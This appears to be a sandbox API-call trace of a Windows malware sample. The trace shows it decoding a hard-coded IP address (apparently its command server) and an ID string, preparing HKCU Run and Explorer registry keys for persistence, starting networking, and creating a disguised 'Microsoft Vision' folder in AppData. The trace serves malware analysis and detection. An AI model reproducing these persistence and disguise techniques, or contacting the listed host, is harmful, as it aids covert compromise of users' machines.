[0199.561] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4a00) returned 0x7dca20
[0199.562] GetProcessHeap () returned 0x7c0000
[0199.562] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4a00) returned 0x7e1428
[0199.563] GetProcessHeap () returned 0x7c0000
[0199.564] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7dca20 | out: hHeap=0x7c0000) returned 1
[0199.566] GetProcessHeap () returned 0x7c0000
[0199.566] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x600) returned 0x7e5e30
[0199.566] GetProcessHeap () returned 0x7c0000
[0199.566] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x600) returned 0x7e6438
[0199.566] GetProcessHeap () returned 0x7c0000
[0199.567] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e5e30 | out: hHeap=0x7c0000) returned 1
[0199.567] GetProcessHeap () returned 0x7c0000
[0199.567] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x2e00) returned 0x8179a8
[0199.567] GetProcessHeap () returned 0x7c0000
[0199.567] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x2e00) returned 0x7dca20
[0199.568] GetProcessHeap () returned 0x7c0000
[0199.568] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x8179a8 | out: hHeap=0x7c0000) returned 1
[0199.568] GetProcessHeap () returned 0x7c0000
[0199.569] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1000) returned 0x7df828
[0199.569] GetProcessHeap () returned 0x7c0000
[0199.569] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1000) returned 0x7e6a40
[0199.569] GetProcessHeap () returned 0x7c0000
[0199.569] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7df828 | out: hHeap=0x7c0000) returned 1
[0199.569] GetProcessHeap () returned 0x7c0000
[0199.569] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x7e5e30
[0199.569] GetProcessHeap () returned 0x7c0000
[0199.569] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x5a4) returned 0x7e7a48
[0199.569] GetProcessHeap () returned 0x7c0000
[0199.569] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x13000) returned 0x7f1998
[0199.570] GetProcessHeap () returned 0x7c0000
[0199.570] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4a00) returned 0x8179a8
[0199.571] GetProcessHeap () returned 0x7c0000
[0199.571] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x600) returned 0x7e7ff8
[0199.571] GetProcessHeap () returned 0x7c0000
[0199.571] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x2e00) returned 0x81c3b0
[0199.571] GetProcessHeap () returned 0x7c0000
[0199.571] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1000) returned 0x7df828
[0199.571] GetProcessHeap () returned 0x7c0000
[0199.572] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e6a40 | out: hHeap=0x7c0000) returned 1
[0199.572] GetProcessHeap () returned 0x7c0000
[0199.572] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7dca20 | out: hHeap=0x7c0000) returned 1
[0199.572] GetProcessHeap () returned 0x7c0000
[0199.573] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e6438 | out: hHeap=0x7c0000) returned 1
[0199.573] GetProcessHeap () returned 0x7c0000
[0199.573] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e1428 | out: hHeap=0x7c0000) returned 1
[0199.573] GetProcessHeap () returned 0x7c0000
[0199.574] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x8049a0 | out: hHeap=0x7c0000) returned 1
[0199.574] GetProcessHeap () returned 0x7c0000
[0199.574] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x81f1b8
[0199.574] GetProcessHeap () returned 0x7c0000
[0199.575] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e5e30 | out: hHeap=0x7c0000) returned 1
[0199.576] lstrlenA (lpString=".bss") returned 4
[0199.576] lstrlenA (lpString=".bss") returned 4
[0199.576] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2950000
[0199.576] lstrcpyA (in: lpString1=0x2950000, lpString2=".bss" | out: lpString1=".bss") returned=".bss"
[0199.576] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x743d0000
[0199.577] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0
[0199.577] GetProcessHeap () returned 0x7c0000
[0199.577] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x13000) returned 0x8049a0
[0199.578] lstrlenA (lpString=".text") returned 5
[0199.578] lstrlenA (lpString=".text") returned 5
[0199.578] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x2960000
[0199.578] lstrcpyA (in: lpString1=0x2960000, lpString2=".text" | out: lpString1=".text") returned=".text"
[0199.578] lstrcmpA (lpString1=".text", lpString2=".bss") returned 1
[0199.578] VirtualFree (lpAddress=0x2960000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.579] GetProcessHeap () returned 0x7c0000
[0199.580] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x8049a0 | out: hHeap=0x7c0000) returned 1
[0199.580] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x743d0000
[0199.580] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0
[0199.580] GetProcessHeap () returned 0x7c0000
[0199.580] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4a00) returned 0x7e0830
[0199.581] lstrlenA (lpString=".rdata") returned 6
[0199.581] lstrlenA (lpString=".rdata") returned 6
[0199.581] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x2960000
[0199.581] lstrcpyA (in: lpString1=0x2960000, lpString2=".rdata" | out: lpString1=".rdata") returned=".rdata"
[0199.581] lstrcmpA (lpString1=".rdata", lpString2=".bss") returned 1
[0199.581] VirtualFree (lpAddress=0x2960000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.582] GetProcessHeap () returned 0x7c0000
[0199.583] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e0830 | out: hHeap=0x7c0000) returned 1
[0199.583] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x743d0000
[0199.583] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0
[0199.583] GetProcessHeap () returned 0x7c0000
[0199.583] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x600) returned 0x81f3c0
[0199.583] lstrlenA (lpString=".data") returned 5
[0199.584] lstrlenA (lpString=".data") returned 5
[0199.584] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x2960000
[0199.584] lstrcpyA (in: lpString1=0x2960000, lpString2=".data" | out: lpString1=".data") returned=".data"
[0199.584] lstrcmpA (lpString1=".data", lpString2=".bss") returned 1
[0199.584] VirtualFree (lpAddress=0x2960000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.585] GetProcessHeap () returned 0x7c0000
[0199.585] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x81f3c0 | out: hHeap=0x7c0000) returned 1
[0199.585] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x743d0000
[0199.585] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0
[0199.585] GetProcessHeap () returned 0x7c0000
[0199.585] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x2e00) returned 0x7dca20
[0199.586] lstrlenA (lpString=".rsrc") returned 5
[0199.586] lstrlenA (lpString=".rsrc") returned 5
[0199.586] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x2960000
[0199.586] lstrcpyA (in: lpString1=0x2960000, lpString2=".rsrc" | out: lpString1=".rsrc") returned=".rsrc"
[0199.586] lstrcmpA (lpString1=".rsrc", lpString2=".bss") returned 1
[0199.586] VirtualFree (lpAddress=0x2960000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.587] GetProcessHeap () returned 0x7c0000
[0199.587] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7dca20 | out: hHeap=0x7c0000) returned 1
[0199.587] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x743d0000
[0199.588] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0
[0199.588] GetProcessHeap () returned 0x7c0000
[0199.588] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1000) returned 0x7dca20
[0199.588] lstrlenA (lpString=".reloc") returned 6
[0199.588] lstrlenA (lpString=".reloc") returned 6
[0199.588] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x2960000
[0199.588] lstrcpyA (in: lpString1=0x2960000, lpString2=".reloc" | out: lpString1=".reloc") returned=".reloc"
[0199.588] lstrcmpA (lpString1=".reloc", lpString2=".bss") returned 1
[0199.589] VirtualFree (lpAddress=0x2960000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.589] GetProcessHeap () returned 0x7c0000
[0199.589] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7dca20 | out: hHeap=0x7c0000) returned 1
[0199.589] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x743d0000
[0199.590] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0
[0199.590] GetProcessHeap () returned 0x7c0000
[0199.590] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x81f3c0
[0199.590] lstrlenA (lpString=".bss") returned 4
[0199.590] lstrlenA (lpString=".bss") returned 4
[0199.590] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2960000
[0199.591] lstrcpyA (in: lpString1=0x2960000, lpString2=".bss" | out: lpString1=".bss") returned=".bss"
[0199.591] lstrcmpA (lpString1=".bss", lpString2=".bss") returned 0
[0199.591] VirtualFree (lpAddress=0x2960000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.591] GetProcessHeap () returned 0x7c0000
[0199.592] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x81f3c0 | out: hHeap=0x7c0000) returned 1
[0199.592] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x743d0000
[0199.592] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0
[0199.592] GetProcessHeap () returned 0x7c0000
[0199.592] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x81f3c0
[0199.592] VirtualFree (lpAddress=0x2950000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.593] GetProcessHeap () returned 0x7c0000
[0199.593] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x81f5c8
[0199.593] GetProcessHeap () returned 0x7c0000
[0199.593] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x81f7d0
[0199.593] GetProcessHeap () returned 0x7c0000
[0199.593] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x81f5c8 | out: hHeap=0x7c0000) returned 1
[0199.593] GetProcessHeap () returned 0x7c0000
[0199.593] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1ca) returned 0x81f5c8
[0199.594] GetProcessHeap () returned 0x7c0000
[0199.594] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1ca) returned 0x81f9d8
[0199.594] GetProcessHeap () returned 0x7c0000
[0199.594] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x81f5c8 | out: hHeap=0x7c0000) returned 1
[0199.594] GetProcessHeap () returned 0x7c0000
[0199.594] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1ca) returned 0x81f5c8
[0199.594] GetProcessHeap () returned 0x7c0000
[0199.594] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x32) returned 0x7d0138
[0199.594] GetProcessHeap () returned 0x7c0000
[0199.594] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x32) returned 0x7cfef8
[0199.594] GetProcessHeap () returned 0x7c0000
[0199.595] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d0138 | out: hHeap=0x7c0000) returned 1
[0199.595] GetProcessHeap () returned 0x7c0000
[0199.595] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x32) returned 0x7d02f8
[0199.595] GetProcessHeap () returned 0x7c0000
[0199.595] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7cfef8 | out: hHeap=0x7c0000) returned 1
[0199.595] GetProcessHeap () returned 0x7c0000
[0199.595] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x32) returned 0x7cfef8
[0199.618] GetProcessHeap () returned 0x7c0000
[0199.618] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1ca) returned 0x81fbb0
[0199.618] GetProcessHeap () returned 0x7c0000
[0199.618] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1ca) returned 0x81fd88
[0199.618] GetProcessHeap () returned 0x7c0000
[0199.618] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x81fbb0 | out: hHeap=0x7c0000) returned 1
[0199.618] GetProcessHeap () returned 0x7c0000
[0199.619] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7cfef8 | out: hHeap=0x7c0000) returned 1
[0199.619] GetProcessHeap () returned 0x7c0000
[0199.619] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x81f5c8 | out: hHeap=0x7c0000) returned 1
[0199.619] GetProcessHeap () returned 0x7c0000
[0199.620] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x81f9d8 | out: hHeap=0x7c0000) returned 1
[0199.620] GetProcessHeap () returned 0x7c0000
[0199.620] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x1c) returned 0x7dc8e8
[0199.620] lstrlenW (lpString="20.91.187.223") returned 13
[0199.620] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2950000
[0199.620] lstrlenW (lpString="20.91.187.223") returned 13
[0199.620] lstrcpyW (in: lpString1=0x2950000, lpString2="20.91.187.223" | out: lpString1="20.91.187.223") returned="20.91.187.223"
[0199.620] lstrlenW (lpString="20.91.187.223") returned 13
[0199.620] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2960000
[0199.621] lstrcpyW (in: lpString1=0x2960000, lpString2="20.91.187.223" | out: lpString1="20.91.187.223") returned="20.91.187.223"
[0199.621] VirtualFree (lpAddress=0x2950000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.621] GetProcessHeap () returned 0x7c0000
[0199.622] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7dc8e8 | out: hHeap=0x7c0000) returned 1
[0199.622] lstrlenW (lpString="20.91.187.223") returned 13
[0199.622] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2950000
[0199.622] lstrcpyW (in: lpString1=0x2950000, lpString2="20.91.187.223" | out: lpString1="20.91.187.223") returned="20.91.187.223"
[0199.622] VirtualFree (lpAddress=0x2960000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.623] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0
[0199.623] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0
[0199.623] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0
[0199.623] GetProcessHeap () returned 0x7c0000
[0199.623] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x16) returned 0x7d6798
[0199.623] lstrlenW (lpString="BS8JRXAM5E") returned 10
[0199.623] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2960000
[0199.623] lstrlenW (lpString="BS8JRXAM5E") returned 10
[0199.623] lstrcpyW (in: lpString1=0x2960000, lpString2="BS8JRXAM5E" | out: lpString1="BS8JRXAM5E") returned="BS8JRXAM5E"
[0199.623] lstrlenW (lpString="BS8JRXAM5E") returned 10
[0199.623] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2970000
[0199.623] lstrcpyW (in: lpString1=0x2970000, lpString2="BS8JRXAM5E" | out: lpString1="BS8JRXAM5E") returned="BS8JRXAM5E"
[0199.623] VirtualFree (lpAddress=0x2960000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.624] GetProcessHeap () returned 0x7c0000
[0199.624] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d6798 | out: hHeap=0x7c0000) returned 1
[0199.624] lstrlenW (lpString="BS8JRXAM5E") returned 10
[0199.624] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2960000
[0199.625] lstrcpyW (in: lpString1=0x2960000, lpString2="BS8JRXAM5E" | out: lpString1="BS8JRXAM5E") returned="BS8JRXAM5E"
[0199.625] VirtualFree (lpAddress=0x2970000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.625] GetProcessHeap () returned 0x7c0000
[0199.625] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x81fd88 | out: hHeap=0x7c0000) returned 1
[0199.625] GetProcessHeap () returned 0x7c0000
[0199.626] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x81f3c0 | out: hHeap=0x7c0000) returned 1
[0199.626] GetProcessHeap () returned 0x7c0000
[0199.626] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x81f1b8 | out: hHeap=0x7c0000) returned 1
[0199.626] GetProcessHeap () returned 0x7c0000
[0199.626] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7df828 | out: hHeap=0x7c0000) returned 1
[0199.627] GetProcessHeap () returned 0x7c0000
[0199.627] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x81c3b0 | out: hHeap=0x7c0000) returned 1
[0199.627] GetProcessHeap () returned 0x7c0000
[0199.627] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7ff8 | out: hHeap=0x7c0000) returned 1
[0199.627] GetProcessHeap () returned 0x7c0000
[0199.628] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x8179a8 | out: hHeap=0x7c0000) returned 1
[0199.629] GetProcessHeap () returned 0x7c0000
[0199.630] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f1998 | out: hHeap=0x7c0000) returned 1
[0199.631] GetProcessHeap () returned 0x7c0000
[0199.631] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f1590 | out: hHeap=0x7c0000) returned 1
[0199.631] ReleaseMutex (hMutex=0x288) returned 0
[0199.631] CloseHandle (hObject=0x288) returned 1
[0199.631] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0
[0199.631] GetProcessHeap () returned 0x7c0000
[0199.631] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x32) returned 0x7d03b8
[0199.632] lstrlenW (lpString="20.91.187.223") returned 13
[0199.632] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2970000
[0199.632] lstrcpyW (in: lpString1=0x2970000, lpString2="20.91.187.223" | out: lpString1="20.91.187.223") returned="20.91.187.223"
[0199.632] lstrlenW (lpString="BS8JRXAM5E") returned 10
[0199.632] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2980000
[0199.633] lstrcpyW (in: lpString1=0x2980000, lpString2="BS8JRXAM5E" | out: lpString1="BS8JRXAM5E") returned="BS8JRXAM5E"
[0199.633] GetProcessHeap () returned 0x7c0000
[0199.633] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x81f9d8
[0199.633] GetCurrentProcess () returned 0xffffffff
[0199.633] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19f894 | out: TokenHandle=0x19f894*=0x288) returned 1
[0199.633] GetTokenInformation (in: TokenHandle=0x288, TokenInformationClass=0x14, TokenInformation=0x19f88c, TokenInformationLength=0x4, ReturnLength=0x19f890 | out: TokenInformation=0x19f88c, ReturnLength=0x19f890) returned 1
[0199.633] CloseHandle (hObject=0x288) returned 1
[0199.633] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51
[0199.633] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x2990000
[0199.633] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51
[0199.633] lstrcpyW (in: lpString1=0x2990000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\"
[0199.633] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51
[0199.633] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x29a0000
[0199.634] lstrcpyW (in: lpString1=0x29a0000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\"
[0199.634] VirtualFree (lpAddress=0x2990000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.634] lstrlenW (lpString="BS8JRXAM5E") returned 10
[0199.634] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2990000
[0199.635] lstrcpyW (in: lpString1=0x2990000, lpString2="BS8JRXAM5E" | out: lpString1="BS8JRXAM5E") returned="BS8JRXAM5E"
[0199.635] lstrlenW (lpString="BS8JRXAM5E") returned 10
[0199.635] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51
[0199.635] VirtualQuery (in: lpAddress=0x29a0000, lpBuffer=0x19f84c, dwLength=0x1c | out: lpBuffer=0x19f84c*(BaseAddress=0x29a0000, AllocationBase=0x29a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0199.635] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x29b0000
[0199.635] VirtualFree (lpAddress=0x29a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.636] lstrcatW (in: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\", lpString2="BS8JRXAM5E" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\BS8JRXAM5E") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\BS8JRXAM5E"
[0199.636] VirtualFree (lpAddress=0x2990000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.637] lstrlenW (lpString="inst") returned 4
[0199.637] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2990000
[0199.637] lstrlenW (lpString="inst") returned 4
[0199.637] lstrcpyW (in: lpString1=0x2990000, lpString2="inst" | out: lpString1="inst") returned="inst"
[0199.637] lstrlenW (lpString="inst") returned 4
[0199.637] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x29a0000
[0199.637] lstrcpyW (in: lpString1=0x29a0000, lpString2="inst" | out: lpString1="inst") returned="inst"
[0199.637] VirtualFree (lpAddress=0x2990000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.638] lstrlenW (lpString="InitWindows") returned 11
[0199.638] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2990000
[0199.638] lstrlenW (lpString="InitWindows") returned 11
[0199.638] lstrcpyW (in: lpString1=0x2990000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows"
[0199.638] lstrlenW (lpString="InitWindows") returned 11
[0199.638] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x29c0000
[0199.639] lstrcpyW (in: lpString1=0x29c0000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows"
[0199.639] VirtualFree (lpAddress=0x2990000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.640] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46
[0199.640] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x2990000
[0199.640] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46
[0199.640] lstrcpyW (in: lpString1=0x2990000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
[0199.640] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46
[0199.640] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x29d0000
[0199.640] lstrcpyW (in: lpString1=0x29d0000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
[0199.640] VirtualFree (lpAddress=0x2990000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.641] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\BS8JRXAM5E", ulOptions=0x0, samDesired=0xf003f, phkResult=0x19f950 | out: phkResult=0x19f950*=0x0) returned 0x2
[0199.648] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2990000
[0199.648] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x288
[0199.648] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19fd1c | out: lpWSAData=0x19fd1c) returned 0
[0199.648] GetProcessHeap () returned 0x7c0000
[0199.648] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x32) returned 0x7d0378
[0199.648] lstrlenW (lpString="20.91.187.223") returned 13
[0199.649] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x29e0000
[0199.649] lstrcpyW (in: lpString1=0x29e0000, lpString2="20.91.187.223" | out: lpString1="20.91.187.223") returned="20.91.187.223"
[0199.649] lstrlenW (lpString="BS8JRXAM5E") returned 10
[0199.649] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x29f0000
[0199.649] lstrcpyW (in: lpString1=0x29f0000, lpString2="BS8JRXAM5E" | out: lpString1="BS8JRXAM5E") returned="BS8JRXAM5E"
[0199.649] GetProcessHeap () returned 0x7c0000
[0199.649] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x81fbe0
[0199.649] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2a00000
[0199.649] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x19fad8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0
[0199.651] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Microsoft Vision\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\"
[0199.651] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft vision"), lpSecurityAttributes=0x0) returned 1
[0199.653] GetProcessHeap () returned 0x7c0000
